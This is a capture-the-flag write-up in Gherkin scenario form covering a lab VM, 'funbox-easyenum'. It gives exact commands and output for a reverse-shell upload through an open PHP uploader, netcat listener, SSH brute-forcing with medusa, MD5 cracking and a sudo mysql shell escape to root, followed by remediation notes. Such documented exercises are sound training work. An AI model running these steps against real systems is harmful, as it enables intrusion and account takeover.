## Version 1.4.1
## language: en

Feature:
  TOE:
    funbox-easyenum
  Category:
    Remote Code Execution
  Location:
    http://192.168.10.4:80/mini.php
  CWE:
    CWE-94: Improper Control of Generation of Code ('Code Injection')
  Rule:
    REQ.043: https://fluidattacks.com/products/rules/list/043
  Goal:
    Get remote connection and root privileges
  Recommendation:
    Avoid that an user upload files without any previous authentication
    And if it's necessary to upload files. Before uploading them, it check them
    Not using weak passwords

  Background:
  Hacker's software:
    | <Software name>            | <Version>|
    | Kali Linux                 | 2020.4   |
    | Mozilla Firefox            | 78.3.0   |
    | Burp Suit Community Edition| 2020.9.1 |
    | Gobuster                   | 3.0.1    |
    | Medusa                     | 2.2      |
    | Netcat                     | 1.10     |
    | Nmap                       | 7.91     |
    | SearchSploit               | 3.8.3    |

  TOE information:
    Given a .OVA file
    Then I executed it on Virtualbox
    Then I saw that the machine was running Ubuntu 18.04.5
    And it was requesting an user as it's shown in [evidence] (01.png)
    Then I verified which IP was assigned to me by dhcp server with the command
    """
    (kali㉿kali)-[~]$ ifconfig eth0
    eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
    inet 192.168.10.3  netmask 255.255.255.0  broadcast 192.168.10.255
    inet6 fe80::a00:27ff:feab:81c  prefixlen 64  scopeid 0x20<link>
    ether 08:00:27:ab:08:1c  txqueuelen 1000  (Ethernet)
    RX packets 39  bytes 12534 (12.2 KiB)
    RX errors 0  dropped 0  overruns 0  frame 0
    TX packets 795  bytes 50650 (49.4 KiB)
    TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    """
    And I scanned the network using nmap with the next command
    """
    (kali㉿kali)-[~]$ nmap -sP 192.168.10.0/24
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-24 18:49 EST
    Nmap scan report for 192.168.10.3
    Host is up (0.00031s latency).
    Nmap scan report for 192.168.10.4
    Host is up (0.00048s latency).
    Nmap done: 256 IP addresses (2 hosts up) scanned in 3.02 seconds
    """
    Then I knew that 192.168.10.4 was the target machine's IP address
    And I used nmap again to know which ports were opened with the command
    """
    (kali㉿kali)-[~]$ nmap -sV 192.168.10.4
    Nmap scan report for 192.168.10.4
    Host is up (0.00026s latency).
    Not shown: 998 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
    (Ubuntu Linux; protocol 2.0)
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    """
    Then I saw that ports 22 and 80 were running SSH and HTTP respectively
    And SSH and HTTP were using 2.0 and 2.4.29 versions

  Scenario: Normal use case
    Given HTTP service was working on port 80
    Then I could access to site webpage on http://192.168.10.4 using browser
    And thus I could see the apache default webpage [evidence] (02.png)

  Scenario: Static detection
    Given I didn't have access to the source code
    Then I couldn't do this detection

  Scenario: Dynamic detection
    Given I didn't find any wrong while I was analyzing the server
    Then I scanned the server directories with gobuster using the next command
    """
    (kali㉿kali)[~]$ gobuster dir -u 192.168.10.4 -w /usr/share/SecLists/Discov
    ery/Web-Content/raft-large-words.txt -x php,html -s 200,204,301,302,307,401
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://192.168.10.4
    [+] Threads:        10
    [+] Wordlist:       /usr/share/SecLists/Discovery/Web-Content/raft-large
    -words.txt
    [+] Status codes:   200,204,301,302,307,401
    [+] User Agent:     gobuster/3.0.1
    [+] Extensions:     php,html
    [+] Timeout:        10s
    ===============================================================
    2021/01/24 19:20:05 Starting gobuster
    ===============================================================
    /index.html (Status: 200)
    /javascript (Status: 301)
    /. (Status: 200)
    /phpmyadmin (Status: 301)
    /secret (Status: 301)
    /mini.php (Status: 200)
    ===============================================================
    2021/01/24 19:21:01 Finished
    ===============================================================
    """
    Then I tried to enter to javascript directory but I didn't have permission
    Then I entered to the secret directory
    And I found out a strange message as it can see in [evidence] (03.png)
    Then I tried to decode it using utf-8 decoder but it didn't work
    Then I checked the response using burpsuit [evidence] (04.png)
    Then I translated the message using
    """
    https://translate.google.com
    """
    And I got the next message
    """
    The root password is a combination of user passwords:
    harrysallygoatoraclelissy
    """
    Then I accessed to phpmyadmin directory
    Then I tried to log me as a root user
    And having used the default password, I couldn't authenticate me
    Then I tried the password suggested previously but it didn't work too
    Then I accessed to mini.php
    And Having entered I noted that I could upload files [evidence] (05.png)
    Then I downloaded the php reverse shell from
    """
    https://github.com/pentestmonkey/php-reverse-shell/blob/master
    /php-reverse-shell.php
    """
    And before uploading it, I've modified IP parameter
    And I uploaded it to mini.php [evidence] (06.png)
    Then I executed it as it can see in [evidence] (07.png)

  Scenario: Exploitation
    Given I previously executed the php file
    And I'd configured port 1234 in listen mode using netcat with the command
    """
    (kali㉿kali)-[~]$ nc -lvnp 1234
    listening on [any] 1234 ...
    connect to [192.168.10.3] from (UNKNOWN) [192.168.10.4] 59816
    Linux funbox7 4.15.0-117-generic #118-Ubuntu SMP Fri Sep 4 20:02:41
    UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
    16:16:08 up  1:30,  0 users,  load average: 0.00, 0.00, 0.00
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $
    """
    Then after getting remote access, I tried accessed to root directory
    """
    $ cd root
    /bin/sh: 1: cd: can't cd to root
    """
    Then having tried the last step, I searched information about kernel with
    """
    (kali㉿kali)-[~]$ uname -a
    Linux funbox7 4.15.0-117-generic #118-Ubuntu SMP Fri Sep 4 20:02:41 UTC
    2020 x86_64 x86_64 x86_64 GNU/Linux
    """
    Then I searched exploits using searchsploit with the next command
    """
    (kali㉿kali)-[~]$ searchsploit kernel 4.15.0
    ---------------------------------------------- ----------------------
     Exploit Title                                |  Path
    ---------------------------------------------- ----------------------
    Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora | linux/local/9479.c
    Linux Kernel 4.10 < 5.1.17 - 'PTRACE_TRACEME' | linux/local/47163.c
    Linux Kernel 4.15.x < 4.19.2 - 'map_write() C | linux/local/47164.sh
    Linux Kernel 4.15.x < 4.19.2 - 'map_write() C | linux/local/47165.sh
    Linux Kernel 4.15.x < 4.19.2 - 'map_write() C | linux/local/47166.sh
    Linux Kernel 4.15.x < 4.19.2 - 'map_write() C | linux/local/47167.sh
    Linux Kernel 4.8.0 UDEV < 232 - Local Privile | linux/local/41886.c
    Linux Kernel < 4.15.4 - 'show_floppy' KASLR A | linux/local/44325.c
    """
    Then I tried to execute them but I couldn't due to gcc wasn't installed
    And I didn't have enough permissions
    Then I searched in the home directory to identify the users in the system
    """
    $ cd /home
    $ ls
    goat
    harry
    karla
    oracle
    sally
    """
    And I found the next hint in the karla's directory
    """
    $ ls
    read.me
    $ cat read.me
    karla is really not a part of this CTF !
    """
    Then I tried to find similar clues but I didn't find more
    Then as at that moment I knew the machine users
    Then I tried a bruteforce attack to SSH service using medusa
    And I executed the next commands for that
    """
    medusa -h 192.168.10.4 -u goat -P /usr/share/wordlists/rockyou.txt -M ssh
    -f -v 6
    medusa -h 192.168.10.4 -u harry -P /usr/share/wordlists/rockyou.txt -M ssh
    -f -v 6
    medusa -h 192.168.10.4 -u oracle -P /usr/share/wordlists/rockyou.txt -M ssh
    -f -v 6
    medusa -h 192.168.10.4 -u sally -P /usr/share/wordlists/rockyou.txt -M ssh
    -f -v 6
    """
    Then I found goat's password [evidence] (08.png)
    Then I connected using SSH with the next command
    """
    (kali㉿kali)-[~]$ ssh goat@192.168.10.4
    goat@192.168.10.4's password:
    Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-117-generic x86_64)
    * Documentation:  https://help.ubuntu.com
    * Management:     https://landscape.canonical.com
    * Support:        https://ubuntu.com/advantage
    System information as of Mon Jan 25 18:15:03 UTC 2021
    System load:  0.01              Processes:             101
    Usage of /:   85.1% of 4.66GB   Users logged in:       0
    Memory usage: 51%               IP address for enp0s3: 192.168.10.4
    Swap usage:   0%
    => / is using 85.1% of 4.66GB
    * Canonical Livepatch is available for installation.
    - Reduce system reboots and improve kernel security. Activate at:
    https://ubuntu.com/livepatch
    0 packages can be updated.
    0 updates are security updates.
    goat@funbox7:~$
    """
    Then I tried to access to root directory again
    """
    goat@funbox7:/$ cd root
    -bash: cd: root: Permission denied
    """
    Then I verified if that user had any root privilege with the command
    """
    goat@funbox7:/$ sudo --list
    Matching Defaults entries for goat on funbox7:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:
    /bin\:/snap/bin
    User goat may run the following commands on funbox7:
    (root) NOPASSWD: /usr/bin/mysql
    """
    Then I executed mysql with the command
    """
    goat@funbox7:/$ sudo mysql
    Welcome to the MySQL monitor.  Commands end with ; or \g.
    Your MySQL connection id is 279591
    Server version: 5.7.31-0ubuntu0.18.04.1 (Ubuntu)
    Copyright (c) 2000, 2020, Oracle and/or its affiliates.
    All rights reserved.
    Oracle is a registered trademark of Oracle Corporation and/or its
    affiliates. Other names may be trademarks of their respective
    owners.
    Type 'help;' or '\h' for help. Type '\c' to clear
    the current input statement.
    mysql>
    """
    Then I checked the databases with the next command
    """
    mysql> SHOW DATABASES;
    +--------------------+
    | Database           |
    +--------------------+
    | information_schema |
    | db1                |
    | mysql              |
    | performance_schema |
    | phpmyadmin         |
    | sys                |
    +--------------------+
    """
    Then I selected db1 database with the command
    """
    mysql> USE db1;
    Reading table information for completion of table and column names
    You can turn off this feature to get a quicker startup with -A
    Database changed
    """
    Then I revised tables in that database with  the next command
    """
    mysql> SHOW TABLES;
    +---------------+
    | Tables_in_db1 |
    +---------------+
    | users         |
    +---------------+
    """
    Then I checked the table
    """
    mysql> DESCRIBE users;
    +--------+-------------+------+-----+---------+-------+
    | Field  | Type        | Null | Key | Default | Extra |
    +--------+-------------+------+-----+---------+-------+
    | id     | varchar(64) | NO   |     | NULL    |       |
    | name   | varchar(64) | NO   |     | NULL    |       |
    | passwd | varchar(64) | NO   |     | NULL    |       |
    +--------+-------------+------+-----+---------+-------+
    """
    Then after seeing name and passwd columns, I decided to revise the table
    """
    mysql> SELECT * FROM users;
    +----+-------+----------------------------------+
    | id | name  | passwd                           |
    +----+-------+----------------------------------+
    | 1  | harry | e10adc3949ba59abbe56e057f20f883e |
    +----+-------+----------------------------------+
    """
    When I saw the password format I determined that its encryption was md5
    Then I deciphered md5 password using
    """
    https://www.md5online.org/md5-decrypt.html
    """
    And thus I found the next equivalence
    """
    e10adc3949ba59abbe56e057f20f883e=123456
    """
    Then I tried to authenticate me through SSH with that user and password
    And it didn't work
    Then I tried to authenticate me in phpmyadmin but it didn't work too
    Then I searched a way to escalate privileges with mysql
    And I found that it's possible to do it using the command
    """
    goat@funbox7:~$ sudo mysql -e '\! /bin/sh'
    #
    """
    Then I could finally accessed to root directory
    And thus I got the flag [evidence] (09.png)

  Scenario: Remediation
    Given the system is vulnerable to a remote code execution attack
    And the passwords are weak
    And some users can execute functions as a privileged user
    Then it'd better deny upload files without the correct validation
    And establish good password policies to have strong passwords
    And assign user privileges in a better way

  Scenario: Scoring
   Base: Attributes that are constants over time and organizations
     7.3/10 (High) - AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H/
   Temporal: Attributes that measure the exploit's popularity and fixability
     7.5/10 (High) - E:H/RL:O/RC:C/
   Environmental: Unique and relevant attributes to a specific user environment
     7.8/10 (High) - CR:L/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found until date 2021-01-25
